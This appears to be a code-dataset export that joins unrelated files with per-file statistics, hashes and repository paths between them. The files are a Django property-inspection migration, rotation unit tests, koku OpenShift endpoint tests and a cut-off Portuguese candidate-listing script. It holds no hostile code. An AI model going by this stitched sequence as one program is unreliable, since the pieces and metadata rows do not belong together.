('towel_dispencer', models.BooleanField(default=False)),
('detegent_dispencer', models.BooleanField(default=False)),
('mirror', models.BooleanField(default=False)),
('furniture', models.BooleanField(default=False)),
('fire_extinguisher', models.BooleanField(default=False)),
('shelving', models.BooleanField(default=False)),
('status', models.CharField(default=None, max_length=20, null=True, blank=True, choices=[(b'Good Condition', b'Good Condition'), (b'Minor Damages', b'Minor Damages'), (b'Major Damages', b'Major Damages')])),
('accept', models.BooleanField(default=False)),
('authorize', models.CharField(default=b'Pending', max_length=20, null=True, blank=True, choices=[(b'Pending', b'Pending'), (b'Aproved', b'Authorize'), (b'Declined', b'Decline')])),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('branch', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='offices.Branch', null=True)),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('floor', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='offices.Floor', null=True)),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
('inspector', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='employees.Employee', null=True)),
('modified_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical toilet inspection',
},
),
migrations.CreateModel(
name='LeaseAgreement',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('office_space', models.CharField(default=None, max_length=200, null=True, blank=True)),
('rental_amount', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('surety', models.BooleanField(default=False)),
('deposit', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('surety_deposit', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('electricity_deposit', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('electricity', models.CharField(default=None, max_length=200, null=True, blank=True, choices=[(b'Eskom', b'Eskom'), (b'Pre-Paid', b'Pre-Paid'), (b'PEC', b'PEC Metering'), (b'Municipal', b'Municipal')])),
('current_leasee', models.CharField(default=None, max_length=200, null=True, blank=True)),
('leasor', models.CharField(default=b'Pending', max_length=200, null=True, blank=True)),
('lease_expiry_date', models.DateField(null=True, blank=True)),
('notice_term', models.CharField(default=None, max_length=200, null=True, blank=True)),
('contact_person', models.CharField(default=None, max_length=200, null=True, blank=True)),
('status', models.CharField(default=b'Operational', max_length=20, null=True, blank=True, choices=[(b'Operational', b'Operational'), (b'Pending Closure', b'Pending Closure'), (b'Closed', b'Closed')])),
('exit_clause_sent', models.BooleanField(default=False)),
('accept', models.BooleanField(default=False)),
('authorize', models.CharField(default=b'Pending', max_length=20, null=True, blank=True, choices=[(b'Pending', b'Pending'), (b'Aproved', b'Authorize'), (b'Declined', b'Decline')])),
('branch', models.ForeignKey(related_name='branch_leaseagreements', to='offices.Branch')),
('created_by', models.ForeignKey(related_name='user_leaseagreements', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('modified_by', models.ForeignKey(related_name='user_modified_leaseagreements', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
),
migrations.CreateModel(
name='LeaseAgreementRenewal',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('expiry_date', models.DateField(null=True, blank=True)),
('renewal_date', models.DateField(null=True, blank=True)),
('rental_amount', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('new_expiry_date', models.DateField(null=True, blank=True)),
('accept', models.BooleanField(default=False)),
('authorize', models.CharField(default=b'Pending', max_length=20, null=True, blank=True, choices=[(b'Pending', b'Pending'), (b'Aproved', b'Authorize'), (b'Declined', b'Decline')])),
('branch', models.ForeignKey(related_name='branch_leaseagreement_renewals', to='offices.Branch')),
('created_by', models.ForeignKey(related_name='user_leaseagreementrenewals', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('modified_by', models.ForeignKey(related_name='user_modified_leaseagreementrenewals', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
),
migrations.CreateModel(
name='OfficeInspection',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('date_checked', models.DateField(null=True, blank=True)),
('time_checked', models.TimeField(null=True, blank=True)),
('walls_and_covering', models.BooleanField(default=False)),
('windows_and_handles', models.BooleanField(default=False)),
('blinds', models.BooleanField(default=False)),
('ceiling', models.BooleanField(default=False)),
('lights_and_switches', models.BooleanField(default=False)),
('doors_and_handles', models.BooleanField(default=False)),
('air_conditioner', models.BooleanField(default=False)),
('furniture', models.BooleanField(default=False)),
('fire_extinguisher', models.BooleanField(default=False)),
('white_board', models.BooleanField(default=False)),
('overhead_projector', models.BooleanField(default=False)),
('appliances', models.BooleanField(default=False)),
('shelving', models.BooleanField(default=False)),
('status', models.CharField(default=None, max_length=20, null=True, blank=True, choices=[(b'Good Condition', b'Good Condition'), (b'Minor Damages', b'Minor Damages'), (b'Major Damages', b'Major Damages')])),
('accept', models.BooleanField(default=False)),
('authorize', models.CharField(default=b'Pending', max_length=20, null=True, blank=True, choices=[(b'Pending', b'Pending'), (b'Aproved', b'Authorize'), (b'Declined', b'Decline')])),
('branch', models.ForeignKey(related_name='branch_propfac_inspections', to='offices.Branch')),
('created_by', models.ForeignKey(related_name='user_officeinspections', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('floor', models.ForeignKey(related_name='floor_propfac_inspections', to='offices.Floor')),
('inspector', models.ForeignKey(related_name='inspector_propfac_inspections', to='employees.Employee')),
('modified_by', models.ForeignKey(related_name='user_modified_officeinspections', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('section', models.ForeignKey(related_name='section_propfac_inspections', to='offices.Section')),
],
),
migrations.CreateModel(
name='PFComment',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('comments', models.CharField(default=None, max_length=2000)),
('commented', models.DateTimeField(auto_now_add=True)),
('comment_type', models.CharField(default=None, max_length=120, null=True, blank=True)),
('obj_id', models.IntegerField(null=True, blank=True)),
('branch', models.ForeignKey(related_name='branch_propfac_comments', blank=True, to='offices.Branch', null=True)),
('created_by', models.ForeignKey(related_name='user_propfac_comments', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
),
migrations.CreateModel(
name='PFDocument',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('file_name', models.CharField(max_length=255, blank=True)),
('file', models.FileField(upload_to=b'uploads/property')),
('obj_id', models.CharField(default=None, max_length=20, null=True, blank=True)),
('obj_type', models.CharField(default=None, max_length=50, null=True, blank=True)),
('date_uploaded', models.DateTimeField(auto_now_add=True)),
('branch', models.ForeignKey(related_name='branch_propfac_documents', to='offices.Branch')),
('created_by', models.ForeignKey(related_name='user_pfdocuments', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
),
migrations.CreateModel(
name='PFRequisition',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('quote_number', models.CharField(default=None, max_length=120)),
('obj_id', models.IntegerField(null=True, blank=True)),
('requisition_type', models.CharField(default=None, max_length=120)),
('description', models.CharField(default=None, max_length=2000, null=True, blank=True)),
('requested', models.DateTimeField(auto_now_add=True)),
('supplier', models.CharField(default=None, max_length=120)),
('vat_included', models.BooleanField(default=True)),
('branch', models.ForeignKey(related_name='branches_propfac_requisitions', to='offices.Branch')),
('created_by', models.ForeignKey(related_name='user_pfrequisitions', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('modified_by', models.ForeignKey(related_name='user_modified_pfrequisitions', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('requested_by', models.ForeignKey(related_name='employee_propfac_requisitions', to='employees.Employee')),
],
),
migrations.CreateModel(
name='PFRequisitionItem',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('item_code', models.CharField(default=None, max_length=200, null=True, blank=True)),
('line_item', models.CharField(default=None, max_length=200, null=True, blank=True)),
('qty', models.IntegerField(null=True, blank=True)),
('unit_price', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('line_total', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('created_by', models.ForeignKey(related_name='user_pfrequisitionitems', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('modified_by', models.ForeignKey(related_name='user_modified_pfrequisitionitems', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('requisition_no', models.ForeignKey(related_name='requisition_requistionItems', to='propfac.PFRequisition')),
],
),
migrations.CreateModel(
name='PropertyMaintenance',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('maint_date', models.DateField(null=True, blank=True)),
('maintenance_type', models.CharField(default=None, max_length=20, null=True, blank=True, choices=[(b'General', b'General'), (b'Air Conditioning', b'Air Conditioning'), (b'Electrical', b'Elecriical'), (b'Floor Capets and Tiling', b'Floor Capets and Tiling'), (b'Plumbing', b'Plumbing'), (b'Security', b'Security'), (b'Walls And Partitioning', b'Walls And Partitioning')])),
('description', models.CharField(default=None, max_length=2000, null=True, blank=True)),
('projected_cost', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('actual_cost', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('difference', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('invoice_number', models.CharField(default=None, max_length=200, null=True, blank=True)),
('service_provider', models.CharField(default=None, max_length=200, null=True, blank=True)),
('status', models.CharField(default=None, max_length=20, null=True, blank=True, choices=[(b'Good Condition', b'Good Condition'), (b'Minor Damages', b'Minor Damages'), (b'Major Damages', b'Major Damages'), (b'Write Off', b'Write Off')])),
('accept', models.BooleanField(default=False)),
('authorize', models.CharField(default=b'Pending', max_length=20, null=True, blank=True, choices=[(b'Pending', b'Pending'), (b'Aproved', b'Authorize'), (b'Declined', b'Decline')])),
('branch', models.ForeignKey(related_name='branch_building_maintenance', to='offices.Branch')),
('created_by', models.ForeignKey(related_name='user_propertymaintenance', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('modified_by', models.ForeignKey(related_name='user_modified_propertymaintenance', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
),
migrations.CreateModel(
name='ToiletInspection',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('toilet', models.CharField(default=None, max_length=20, null=True, blank=True, choices=[(b'gents', b'Gents'), (b'ladies', b'Ladies')])),
('date_checked', models.DateField(null=True, blank=True)),
('time_checked', models.TimeField(null=True, blank=True)),
('walls_and_covering', models.BooleanField(default=False)),
('windows_and_handles', models.BooleanField(default=False)),
('ceiling', models.BooleanField(default=False)),
('lights_and_switches', models.BooleanField(default=False)),
('doors_and_hanles', models.BooleanField(default=False)),
('air_extractor', models.BooleanField(default=False)),
('seat_and_cover', models.BooleanField(default=False)),
('urinary', models.BooleanField(default=False)),
('water_dispenser', models.BooleanField(default=False)),
('washing_basin', models.BooleanField(default=False)),
('taps', models.BooleanField(default=False)),
('towel_dispencer', models.BooleanField(default=False)),
('detegent_dispencer', models.BooleanField(default=False)),
('mirror', models.BooleanField(default=False)),
('furniture', models.BooleanField(default=False)),
('fire_extinguisher', models.BooleanField(default=False)),
('shelving', models.BooleanField(default=False)),
('status', models.CharField(default=None, max_length=20, null=True, blank=True, choices=[(b'Good Condition', b'Good Condition'), (b'Minor Damages', b'Minor Damages'), (b'Major Damages', b'Major Damages')])),
('accept', models.BooleanField(default=False)),
('authorize', models.CharField(default=b'Pending', max_length=20, null=True, blank=True, choices=[(b'Pending', b'Pending'), (b'Aproved', b'Authorize'), (b'Declined', b'Decline')])),
('branch', models.ForeignKey(related_name='branch_propfac_toilet_inspection', to='offices.Branch')),
('created_by', models.ForeignKey(related_name='user_toiletinspections', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('floor', models.ForeignKey(related_name='floor_propfac_toilet_inspection', to='offices.Floor')),
('inspector', models.ForeignKey(related_name='inspector_propfac_toilet_inspection', to='employees.Employee')),
('modified_by', models.ForeignKey(related_name='user_modified_toiletinspections', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
),
migrations.AddField(
model_name='historicalpfrequisitionitem',
name='requisition_no',
field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='propfac.PFRequisition', null=True),
),
]
| 84.368534 | 389 | 0.629525 | 4,282 | 39,147 | 5.579169 | 0.06142 | 0.059523 | 0.057137 | 0.068313 | 0.936459 | 0.934157 | 0.929468 | 0.929468 | 0.923608 | 0.923608 | 0 | 0.007995 | 0.210821 | 39,147 | 463 | 390 | 84.550756 | 0.765294 | 0.000536 | 0 | 0.796499 | 0 | 0 | 0.197398 | 0.026863 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.008753 | 0 | 0.015317 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2ae2a93f1a2ab923b7d3e98472675db65a7b33f7 | 2,414 | py | Python | tests/test_math_utils.py | andrewlavaia/Traffic-Simulator | 39c21e94ff3026954f1577a8f9e70c6d605cb286 | [
"MIT"
] | null | null | null | tests/test_math_utils.py | andrewlavaia/Traffic-Simulator | 39c21e94ff3026954f1577a8f9e70c6d605cb286 | [
"MIT"
] | null | null | null | tests/test_math_utils.py | andrewlavaia/Traffic-Simulator | 39c21e94ff3026954f1577a8f9e70c6d605cb286 | [
"MIT"
] | null | null | null | import unittest
import math
import math_utils
class TestRotateAroundPoint(unittest.TestCase):
def test_90_degree_rotation(self):
point = (1, 0)
degrees = 90
expected = (0, 1)
result = math_utils.rotate_point(point, degrees)
self.assertAlmostEqual(expected[0], result[0], places=10)
self.assertAlmostEqual(expected[1], result[1], places=10)
def test_45_degree_rotation(self):
point = (1, 0)
degrees = 45
expected = (math.sqrt(2)/2, math.sqrt(2)/2)
result = math_utils.rotate_point(point, degrees)
self.assertAlmostEqual(expected[0], result[0], places=10)
self.assertAlmostEqual(expected[1], result[1], places=10)
def test_0_degree_rotation(self):
point = (1, 0)
degrees = 0
expected = (1, 0)
result = math_utils.rotate_point(point, degrees)
self.assertAlmostEqual(expected[0], result[0], places=10)
self.assertAlmostEqual(expected[1], result[1], places=10)
def test_360_degree_rotation(self):
point = (1, 0)
degrees = 1080
expected = (1, 0)
result = math_utils.rotate_point(point, degrees)
self.assertAlmostEqual(expected[0], result[0], places=10)
self.assertAlmostEqual(expected[1], result[1], places=10)
def test_90_degree_rotation_around_point(self):
point = (5, 3)
center_point = (3, 3)
degrees = 90
expected = (3, 5)
result = math_utils.rotate_point(point, degrees, center_point)
self.assertAlmostEqual(expected[0], result[0], places=10)
self.assertAlmostEqual(expected[1], result[1], places=10)
def test_45_degree_rotation_around_point(self):
point = (5, 3)
center_point = (3, 3)
degrees = 45
expected = (3 + math.sqrt(2), 3 + math.sqrt(2))
result = math_utils.rotate_point(point, degrees, center_point)
self.assertAlmostEqual(expected[0], result[0], places=10)
self.assertAlmostEqual(expected[1], result[1], places=10)
def test_0_degree_rotation_around_point(self):
point = (5, 3)
center_point = (3, 3)
degrees = 0
expected = (5, 3)
result = math_utils.rotate_point(point, degrees, center_point)
self.assertAlmostEqual(expected[0], result[0], places=10)
self.assertAlmostEqual(expected[1], result[1], places=10)
| 37.138462 | 70 | 0.636288 | 306 | 2,414 | 4.862745 | 0.104575 | 0.197581 | 0.272849 | 0.09879 | 0.877688 | 0.870296 | 0.870296 | 0.803091 | 0.801747 | 0.801747 | 0 | 0.06612 | 0.241922 | 2,414 | 64 | 71 | 37.71875 | 0.746995 | 0 | 0 | 0.696429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.125 | false | 0 | 0.053571 | 0 | 0.196429 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2d6fc6b164b95f7b2f458487d5355480c5bf6faa | 5,783 | py | Python | koku/api/resource_types/test/openshift_projects/test_views.py | rubik-ai/koku | 3255d1c217b7b6685cb2e130bf4e025946e76fac | [
"Apache-2.0"
] | 157 | 2018-04-30T16:27:53.000Z | 2022-03-31T08:17:21.000Z | koku/api/resource_types/test/openshift_projects/test_views.py | rubik-ai/koku | 3255d1c217b7b6685cb2e130bf4e025946e76fac | [
"Apache-2.0"
] | 3,250 | 2018-04-26T14:14:25.000Z | 2022-03-31T23:49:15.000Z | koku/api/resource_types/test/openshift_projects/test_views.py | rubik-ai/koku | 3255d1c217b7b6685cb2e130bf4e025946e76fac | [
"Apache-2.0"
] | 65 | 2018-05-10T14:11:50.000Z | 2022-03-18T19:22:58.000Z | #
# Copyright 2021 Red Hat Inc.
# SPDX-License-Identifier: Apache-2.0
#
"""Test the Resource Types views."""
from django.db.models import F
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APIClient
from tenant_schemas.utils import schema_context
from api.iam.test.iam_test_case import IamTestCase
from api.iam.test.iam_test_case import RbacPermissions
from reporting.provider.ocp.models import OCPCostSummaryByProjectP
class ResourceTypesViewTestOpenshiftProjects(IamTestCase):
"""Tests the resource types views."""
def setUp(self):
"""Set up the customer view tests."""
super().setUp()
self.client = APIClient()
@RbacPermissions({"openshift.project": {"read": ["cost-management"]}})
def test_openshift_project_with_project_access_view(self):
"""Test endpoint runs with a customer owner."""
with schema_context(self.schema_name):
expected = (
OCPCostSummaryByProjectP.objects.annotate(**{"value": F("namespace")})
.values("value")
.distinct()
.filter(namespace__in=["cost-management"])
.count()
)
# check that the expected is not zero
self.assertTrue(expected)
url = reverse("openshift-projects")
response = self.client.get(url, **self.headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
json_result = response.json()
self.assertIsNotNone(json_result.get("data"))
self.assertIsInstance(json_result.get("data"), list)
self.assertEqual(len(json_result.get("data")), expected)
@RbacPermissions({"openshift.cluster": {"read": ["OCP-on-AWS"]}})
def test_openshift_project_with_cluster_access_view(self):
"""Test endpoint runs with a customer owner."""
with schema_context(self.schema_name):
expected = (
OCPCostSummaryByProjectP.objects.annotate(**{"value": F("namespace")})
.values("value")
.distinct()
.filter(cluster_id__in=["OCP-on-AWS"])
.count()
)
# check that the expected is not zero
self.assertTrue(expected)
url = reverse("openshift-projects")
response = self.client.get(url, **self.headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
json_result = response.json()
self.assertIsNotNone(json_result.get("data"))
self.assertIsInstance(json_result.get("data"), list)
self.assertEqual(len(json_result.get("data")), expected)
@RbacPermissions(
{"openshift.cluster": {"read": ["OCP-on-AWS"]}, "openshift.project": {"read": ["cost-management"]}}
)
def test_openshift_project_with_cluster_and_project_access_view(self):
"""Test endpoint runs with a customer owner."""
with schema_context(self.schema_name):
expected = (
OCPCostSummaryByProjectP.objects.annotate(**{"value": F("namespace")})
.values("value")
.distinct()
.filter(namespace__in=["cost-management"], cluster_id__in=["OCP-on-AWS"])
.count()
)
# check that the expected is not zero
self.assertTrue(expected)
url = reverse("openshift-projects")
response = self.client.get(url, **self.headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
json_result = response.json()
self.assertIsNotNone(json_result.get("data"))
self.assertIsInstance(json_result.get("data"), list)
self.assertEqual(len(json_result.get("data")), expected)
@RbacPermissions({"openshift.cluster": {"read": ["OCP-on-AWS"]}, "openshift.project": {"read": ["*"]}})
def test_openshift_project_with_cluster_and_all_project_access_view(self):
"""Test endpoint runs with a customer owner."""
with schema_context(self.schema_name):
expected = (
OCPCostSummaryByProjectP.objects.annotate(**{"value": F("namespace")})
.values("value")
.distinct()
.filter(cluster_id__in=["OCP-on-AWS"])
.count()
)
# check that the expected is not zero
self.assertTrue(expected)
url = reverse("openshift-projects")
response = self.client.get(url, **self.headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
json_result = response.json()
self.assertIsNotNone(json_result.get("data"))
self.assertIsInstance(json_result.get("data"), list)
self.assertEqual(len(json_result.get("data")), expected)
@RbacPermissions({"openshift.cluster": {"read": ["*"]}, "openshift.project": {"read": ["cost-management"]}})
def test_openshift_project_with_all_cluster_and_project_access_view(self):
"""Test endpoint runs with a customer owner."""
with schema_context(self.schema_name):
expected = (
OCPCostSummaryByProjectP.objects.annotate(**{"value": F("namespace")})
.values("value")
.distinct()
.filter(namespace__in=["cost-management"])
.count()
)
# check that the expected is not zero
self.assertTrue(expected)
url = reverse("openshift-projects")
response = self.client.get(url, **self.headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
json_result = response.json()
self.assertIsNotNone(json_result.get("data"))
self.assertIsInstance(json_result.get("data"), list)
self.assertEqual(len(json_result.get("data")), expected)
| 44.145038 | 112 | 0.62995 | 619 | 5,783 | 5.714055 | 0.169628 | 0.056545 | 0.055131 | 0.072095 | 0.862313 | 0.862313 | 0.8527 | 0.842239 | 0.82471 | 0.82471 | 0 | 0.004772 | 0.238976 | 5,783 | 130 | 113 | 44.484615 | 0.798909 | 0.094933 | 0 | 0.711538 | 0 | 0 | 0.108968 | 0 | 0 | 0 | 0 | 0 | 0.240385 | 1 | 0.057692 | false | 0 | 0.076923 | 0 | 0.144231 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2dacf3a29f3e09942f5d1d917e427ee7d8f86458 | 32,414 | py | Python | lista_de_candidatos.py | rennancrf/PythonScripts | 1bab9a564cf6036b2fa111095fe7145767a4f82c | [
"MIT"
] | 1 | 2019-05-02T12:01:14.000Z | 2019-05-02T12:01:14.000Z | lista_de_candidatos.py | rennancrf/PythonScripts | 1bab9a564cf6036b2fa111095fe7145767a4f82c | [
"MIT"
] | null | null | null | lista_de_candidatos.py | rennancrf/PythonScripts | 1bab9a564cf6036b2fa111095fe7145767a4f82c | [
"MIT"
] | null | null | null |
##################################################################
##### UNIVERSIDADE ESTACIO DE SA #####
##### POS-GRADUACAO EM CIENCIA DE DADOS E BIG DATA ANALYTICS #####
##### Trabalho Linguagem Python 2.7 #####
##### Rennan Goncalves Sanches Correa #####
##### Linguagem Python 2.7 (NPG2064) #####
##### Tutor: Prof. Andre Luiz Braga #####
##################################################################
##################################################################
##### ANTES DE INICIAR A EXECUCAO DO ARQUIVO #####
##### O DIRETORIO "Trab_Rennan" DEVE ESTAR CRIADO #####
##### EM C:\ #####
##################################################################
import pickle
########################################################################################################################
# Definindo funcao para consulta de dados
def consultas():
base = raw_input('\nDigite o nome do arquivo para consulta:\n')
try:
v_arquivo = open("C:/Trab_Rennan/" + base + ".dat", "rb")
except:
print("Erro ao abrir arquivo " + base + ".dat\n")
raw_input("Pressione <Enter> para sair...")
exit()
opcao_cons = raw_input("\nSelecione o Tipo de consulta:\n"
"1-Listar Candidatos\n"
"2-Listar Votos por Candidatos\n"
"3-Listar Total de Votos por Cargo e Região\n"
"4-Listar Total de Votos por Regiao e Candidato\n"
"5-Sair\n")
v_arquivo.seek(0,2)
tamanho = v_arquivo.tell()
v_arquivo.seek(0)
cod_candidato = []
nome = []
cargo = []
regiao = []
num_votos = []
while v_arquivo.tell() < tamanho:
cod_candidato.append(pickle.load(v_arquivo))
nome.append(pickle.load(v_arquivo))
cargo.append(pickle.load(v_arquivo))
regiao.append(pickle.load(v_arquivo))
num_votos.append(pickle.load(v_arquivo))
v_arquivo.close()
# Elaborando menu de opcoes
#################################################################
if opcao_cons == '1':
print '\nRelação de candidatos\n'
texto = '|COD_CANDIDATO |'
texto = texto + str('NOME').ljust(30,' ')
texto = texto + str('|CARGO').ljust(22,' ')
texto = texto + str('|REGIÃO').ljust(37,' ')
#texto = texto + '|'
print texto
for i in range(len(cod_candidato)):
if int(regiao[i]) == 1:
estado = '01-Acre - AC'
elif int(regiao[i]) == 2:
estado = '02- Alagoas - AL'
elif int(regiao[i]) == 3:
estado = '03- Amapá - AP'
elif int(regiao[i]) == 4:
estado = '04- Amazonas - AM'
elif int(regiao[i]) == 5:
estado = '05- Bahia - BA'
elif int(regiao[i]) == 6:
estado = '06- Ceará - CE'
elif int(regiao[i]) == 7:
estado = '07- Distrito Federal - DF'
elif int(regiao[i]) == 8:
estado = '08- Espírito Santo - ES'
elif int(regiao[i]) == 9:
estado = '09- Goiás - GO'
elif int(regiao[i]) == 10:
estado = '10- Maranhão - MA'
elif int(regiao[i]) == 11:
estado = '11- Mato Grosso - MT'
elif int(regiao[i]) == 12:
estado = '12- Mato Grosso do Sul - MS'
elif int(regiao[i]) == 13:
estado = '13- Minas Gerais - MG'
elif int(regiao[i]) == 14:
estado = '14- Pará - PA'
elif int(regiao[i]) == 15:
estado = '15- Paraíba - PB'
elif int(regiao[i]) == 16:
estado = '16- Paraná - PR'
elif int(regiao[i]) == 17:
estado = '17- Pernambuco - PE'
elif int(regiao[i]) == 18:
estado = '18- Piauí - PI'
elif int(regiao[i]) == 19:
estado = '19- Roraima - RR'
elif int(regiao[i]) == 20:
estado = '20- Rondônia - RO'
elif int(regiao[i]) == 21:
estado = '21- Rio de Janeiro - RJ'
elif int(regiao[i]) == 22:
estado = '22- Rio Grande do Norte - RN'
elif int(regiao[i]) == 23:
estado = '23- Rio Grande do Sul - RS'
elif int(regiao[i]) == 24:
estado = '24- Santa Catarina - SC'
elif int(regiao[i]) == 25:
estado = '25- São Paulo - SP'
elif int(regiao[i]) == 26:
estado = '26- Sergipe - SE'
elif int(regiao[i]) == 27:
estado = '27- Tocantins - TO'
print str(cod_candidato[i].ljust(15,' '))+'|'+ str(nome[i].ljust(30,' '))+'|'+ str(cargo[i].ljust(20,' '))+' |'+ str(estado.ljust(35,' '))
###---- CHAMA SUBMENU DE OPÇÕES ----###
submenu_opt = raw_input('\nDigite uma das opções abaixo para continuar:\n'
'1- Voltar para consulta\n'
'2- Voltar para menu inicial\n'
'3- Sair do programa\n')
if int(submenu_opt) == 1:
return consultas()
elif int(submenu_opt) == 2:
return menu_inicial()
else:
exit()
###----------------------------------###
#################################################################
elif opcao_cons == '2':
print '\nRelação de votos por Candidato\n'
texto = '|COD_CANDIDATO |'
texto = texto + str('NOME').ljust(30, ' ')
texto = texto + str('|CARGO').ljust(22, ' ')
texto = texto + str('|NUM_VOTOS|')
texto = texto + str('REGIÃO').ljust(37, ' ')
print texto
for i in range(len(cod_candidato)):
if int(regiao[i]) == 1:
estado = '01-Acre - AC'
elif int(regiao[i]) == 2:
estado = '02- Alagoas - AL'
elif int(regiao[i]) == 3:
estado = '03- Amapá - AP'
elif int(regiao[i]) == 4:
estado = '04- Amazonas - AM'
elif int(regiao[i]) == 5:
estado = '05- Bahia - BA'
elif int(regiao[i]) == 6:
estado = '06- Ceará - CE'
elif int(regiao[i]) == 7:
estado = '07- Distrito Federal - DF'
elif int(regiao[i]) == 8:
estado = '08- Espírito Santo - ES'
elif int(regiao[i]) == 9:
estado = '09- Goiás - GO'
elif int(regiao[i]) == 10:
estado = '10- Maranhão - MA'
elif int(regiao[i]) == 11:
estado = '11- Mato Grosso - MT'
elif int(regiao[i]) == 12:
estado = '12- Mato Grosso do Sul - MS'
elif int(regiao[i]) == 13:
estado = '13- Minas Gerais - MG'
elif int(regiao[i]) == 14:
estado = '14- Pará - PA'
elif int(regiao[i]) == 15:
estado = '15- Paraíba - PB'
elif int(regiao[i]) == 16:
estado = '16- Paraná - PR'
elif int(regiao[i]) == 17:
estado = '17- Pernambuco - PE'
elif int(regiao[i]) == 18:
estado = '18- Piauí - PI'
elif int(regiao[i]) == 19:
estado = '19- Roraima - RR'
elif int(regiao[i]) == 20:
estado = '20- Rondônia - RO'
elif int(regiao[i]) == 21:
estado = '21- Rio de Janeiro - RJ'
elif int(regiao[i]) == 22:
estado = '22- Rio Grande do Norte - RN'
elif int(regiao[i]) == 23:
estado = '23- Rio Grande do Sul - RS'
elif int(regiao[i]) == 24:
estado = '24- Santa Catarina - SC'
elif int(regiao[i]) == 25:
estado = '25- São Paulo - SP'
elif int(regiao[i]) == 26:
estado = '26- Sergipe - SE'
elif int(regiao[i]) == 27:
estado = '27- Tocantins - TO'
print str(cod_candidato[i].ljust(15,' '))+'|'+ str(nome[i].ljust(30,' '))+'|'+ str(cargo[i].ljust(20,' '))+' |'+ str(num_votos[i].ljust(9,' '))+'|' + str(estado).ljust(35,' ')+'|'
###---- CHAMA SUBMENU DE OPÇÕES ----###
submenu_opt = raw_input('\nDigite uma das opções abaixo para continuar:\n'
'1- Voltar para consulta\n'
'2- Voltar para menu inicial\n'
'3- Sair do programa\n')
if int(submenu_opt) == 1:
return consultas()
elif int(submenu_opt) == 2:
return menu_inicial()
else:
exit()
